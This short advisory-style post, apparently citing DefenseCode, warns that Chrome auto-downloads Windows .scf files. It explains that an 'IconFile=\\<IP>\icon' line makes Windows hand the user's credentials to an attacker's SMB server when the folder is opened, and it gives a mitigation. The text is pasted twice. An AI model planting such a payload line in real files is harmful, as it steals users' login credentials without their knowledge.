Watch out for .scf files.
DefenseCode - Home
By default Chrome treats files ending with the .scf extension – Windows Explorer Shell Command File – as being safe regardless of source and will download and save it without the user being prompted for a save location. If the .scf file contains a string in the format “IconFile=\\170.170.170.170\icon” then as soon as the folder containing the downloaded file is opened the system will attempt to retrieve the file “icon” from the IP address given. This address will be hosting an SMB server that will request the users ID and Password transparently via the SMB protocol. This data can then be captured by the attacker and replayed against other services, such as Office 365, or stored for a brute force attack offline.
There is no need for interaction from the user, the act of opening the folder containing the malicious file is sufficient to trigger the attack.
There is no current fix available for Windows as this functionality is part of the OS design. The only current mitigation is to change the defalt setting in Chrome to prompt the user to select a save location which makes the .scf extention visible.
Under normal circumstances the .scf extension is not displayed by windows explorer so “picture.jpg.scf” appears in windows explorer as “picture.jpg.”
DefenseCode - Home
By default Chrome treats files ending with the .scf extension – Windows Explorer Shell Command File – as being safe regardless of source and will download and save it without the user being prompted for a save location. If the .scf file contains a string in the format “IconFile=\\170.170.170.170\icon” then as soon as the folder containing the downloaded file is opened the system will attempt to retrieve the file “icon” from the IP address given. This address will be hosting an SMB server that will request the users ID and Password transparently via the SMB protocol. This data can then be captured by the attacker and replayed against other services, such as Office 365, or stored for a brute force attack offline.
There is no need for interaction from the user, the act of opening the folder containing the malicious file is sufficient to trigger the attack.
There is no current fix available for Windows as this functionality is part of the OS design. The only current mitigation is to change the defalt setting in Chrome to prompt the user to select a save location which makes the .scf extention visible.
Under normal circumstances the .scf extension is not displayed by windows explorer so “picture.jpg.scf” appears in windows explorer as “picture.jpg.”
Comment